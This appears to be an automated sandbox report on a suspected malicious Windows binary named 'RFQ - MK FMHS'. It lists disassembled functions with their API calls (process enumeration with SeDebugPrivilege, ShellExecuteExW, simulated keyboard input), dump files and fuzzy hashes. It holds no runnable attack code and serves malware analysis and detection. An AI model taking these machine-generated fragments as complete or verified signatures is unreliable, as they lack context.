                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
                    • Instruction ID: e2c6d2e42080952b5e1402f9c0fac3727fe1c3c7dcf371ea86bae430c12ba8fd
                    • Opcode Fuzzy Hash: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
                    • Instruction Fuzzy Hash: 1141AB712002019FDB15EF25CC95F6EB7E1AF80714F089469F94AAB3C3DB75A815CB92
                    Function 00ED3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00ED32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
                    • Instruction ID: 4549dc2972f6246236d288e5234d31fb2389f6bc8b3e786d3c879fc8c114cac5
                    • Opcode Fuzzy Hash: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
                    • Instruction Fuzzy Hash: 1F112B31A09356BB9B016A75EC42CAFB3DCDF19374F20102BF900B63D1D6629B4249A7
                    Function 00ED4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED454E
                    • LoadStringW.USER32(00000000), ref: 00ED4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED456B
                    • LoadStringW.USER32(00000000), ref: 00ED4572
                    • _wprintf.LIBCMT ref: 00ED4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00ED4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
                    • Instruction ID: 0840431548fad70f372b8799bb3a96a8c20c97cd0b11b8509949544ce96f5442
                    • Opcode Fuzzy Hash: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
                    • Instruction Fuzzy Hash: 2E0162F2900208BFE710A7A1DD89EF7776CDB48301F0005A6FB45F2151EA749E898B75
                    Function 00EFD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetSystemMetrics.USER32(0000000F), ref: 00EFD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00EFD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00EFDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
                    • Instruction ID: b9d7907568b6ba913e1020e182c43734e5e26755e0263310c7f4dd1a31159e4a
                    • Opcode Fuzzy Hash: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
                    • Instruction Fuzzy Hash: 64B1BA31604219EFCF18CF69C9857BD7BB2BF48714F08D069EE48AB295D770A950CB90
                    Function 00E72A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00E72ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E72B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
                    • Instruction ID: a9ec7e693af6e421d58286894815c2d1f96bc793dabf10650e11d62d99209af3
                    • Opcode Fuzzy Hash: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
                    • Instruction Fuzzy Hash: 78415D30608781AEC7358B29CC9D7BB7BD2AF8E314F28E41DE25FBA560C635A845D710
                    Function 00ED7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED737F
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 00ED73D2
                    • _memmove.LIBCMT ref: 00ED7420
                    • _memmove.LIBCMT ref: 00ED743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: 6210d7d024ac4cea3b41db1ca48870e954f633307fb3b78ead6c5288555dca5e
                    • Instruction ID: fa107e45891e97969ae746f585fb6743dc15f2bbd118ae7660c0b2451053ef53
                    • Opcode Fuzzy Hash: 6210d7d024ac4cea3b41db1ca48870e954f633307fb3b78ead6c5288555dca5e
                    • Instruction Fuzzy Hash: FC31CF31A04205EFDF10DF65DC85AAEBBB8EF84700B1441B6F904BB256DB319A15DBA0
                    Function 00EF6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00EF645A
                    • GetDC.USER32(00000000), ref: 00EF6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00EF6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF6520
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
                    • Instruction ID: 2aa17b12f3aae86ce9f8507d34df2b187565bfa860e2cfe1920bd7f2e14c5033
                    • Opcode Fuzzy Hash: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
                    • Instruction Fuzzy Hash: AB315C72201214BFEF118F51CC8AFBA3BA9EF49765F044065FE08EA295DA759841CBA4
                    Function 00ECC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
                    • Instruction ID: ad555dfbc51c5e15260ec065fdf2ad8f148c798bde1a787f336948b8ebe208e1
                    • Opcode Fuzzy Hash: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
                    • Instruction Fuzzy Hash: 5421AD62A01206B7DA55A5214E47FAF33DC9F103A8F286019FE0DB62C3E752DD12A1B6
                    Function 00EDED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • _wcstok.LIBCMT ref: 00EDEEFF
                    • _wcscpy.LIBCMT ref: 00EDEF8E
                    • _memset.LIBCMT ref: 00EDEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 1eda1a369081421b4c22c0291aad5e089ec7e3b69d2c2b124c4e3384c9ae1279
                    • Instruction ID: a384de9f099a05da45c90d98d974660744f35afbe4e55806ba9cfdcfd1af38a7
                    • Opcode Fuzzy Hash: 1eda1a369081421b4c22c0291aad5e089ec7e3b69d2c2b124c4e3384c9ae1279
                    • Instruction Fuzzy Hash: F9C173715083009FC714EF24C885A5AB7E4FF84314F14996EF99AAB3A2DB70ED45CB82
                    Function 00E71424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
                    • Instruction ID: b9c70198f27b0c4c0a1cd9a01a650a25b6716a48e356fe4a55314954c889fee9
                    • Opcode Fuzzy Hash: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
                    • Instruction Fuzzy Hash: 6B715D30900219EFCB14CF59CC45ABEBBB9FF86314F14C199F919BA252D734AA51CB60
                    Function 00EE6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7fa48023dbfffd48880f483e950a7ba8d3830c2c4b876a934355bdfbb6a81843
                    • Instruction ID: 27a72d6330f12ecb1740931e7c8b72963b84762b216491e4647d6bfbf4f984bb
                    • Opcode Fuzzy Hash: 7fa48023dbfffd48880f483e950a7ba8d3830c2c4b876a934355bdfbb6a81843
                    • Instruction Fuzzy Hash: 5961CC32508344AFC710EB25CC85E6FB7E9EF84714F10A91DF58AA72A2DB709D05CB92
                    Function 00EFB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(014B7648), ref: 00EFB6A5
                    • IsWindowEnabled.USER32(014B7648), ref: 00EFB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFB795
                    • SendMessageW.USER32(014B7648,000000B0,?,?), ref: 00EFB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00EFB809
                    • GetWindowLongW.USER32(014B7648,000000EC), ref: 00EFB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
                    • Instruction ID: d78831f99c32c531edc601e3b2d84786472a00032ace1c6d9a92aa76300efbad
                    • Opcode Fuzzy Hash: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
                    • Instruction Fuzzy Hash: 0871BF34604208AFDB20AF64C894FBA7BB9FF89314F15516AEA45F72A1C731AD41DB50
                    Function 00EEF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EEF75C
                    • _memset.LIBCMT ref: 00EEF825
                    • ShellExecuteExW.SHELL32(?), ref: 00EEF86A
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00EEF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00EEF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: 349ebaf0e09ab081a45689a62888db40986f6f45d9d9e7b2e0db4fa9b36f0e21
                    • Instruction ID: 878fce18d0a74cad14c70e793da7b0a8f9db673de7e17037204699813a41ac23
                    • Opcode Fuzzy Hash: 349ebaf0e09ab081a45689a62888db40986f6f45d9d9e7b2e0db4fa9b36f0e21
                    • Instruction Fuzzy Hash: 1661AD75A00659DFCF14EF65C4809AEBBF4FF88310B149469E85ABB352CB31AD40CB94
                    Function 00ED145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 00ED149C
                    • GetKeyboardState.USER32(?), ref: 00ED14B1
                    • SetKeyboardState.USER32(?), ref: 00ED1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
                    • Instruction ID: 402fd5f51aa5ddf6a0fa69077530704fb99442073a0e55aea3c59d2b4754f434
                    • Opcode Fuzzy Hash: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
                    • Instruction Fuzzy Hash: E95103A06083D53EFB3646348C45BBA7EA99B46308F0894CAE1D569AD2C298EC86D750
                    Function 00ED1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 00ED12B5
                    • GetKeyboardState.USER32(?), ref: 00ED12CA
                    • SetKeyboardState.USER32(?), ref: 00ED132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
                    • Instruction ID: 2d8f824226c4941b2a2fad4a027bf538609afb3be52a5f496f968d0c4191af8a
                    • Opcode Fuzzy Hash: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
                    • Instruction Fuzzy Hash: B75126A05043D57DFB3283248C41B7A7FA9DF06308F08A4CBE1D466AD2D395EC9AE750
                    Function 00ED589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
                    • Instruction ID: 204e18181d2f1f4c58f167cdf06b07d846b098f7cccb2d0bacb712134c7ff7ab
                    • Opcode Fuzzy Hash: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
                    • Instruction Fuzzy Hash: 704142A6C2052876CF11EBF488869CF77E8EF05310F50A956F918F3261E634D715C7A6
                    Function 00ED38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
